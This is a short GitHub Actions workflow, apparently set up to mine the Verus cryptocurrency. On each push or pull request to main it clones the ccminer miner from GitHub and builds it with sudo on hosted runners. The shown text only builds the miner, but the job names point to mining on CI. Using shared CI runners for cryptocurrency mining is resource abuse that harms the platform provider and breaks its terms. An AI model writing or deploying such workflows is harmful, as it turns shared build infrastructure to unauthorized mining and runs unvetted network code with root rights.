name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          git clone https://github.com/tpruvot/ccminer && cd ccminer && sudo ./build.sh
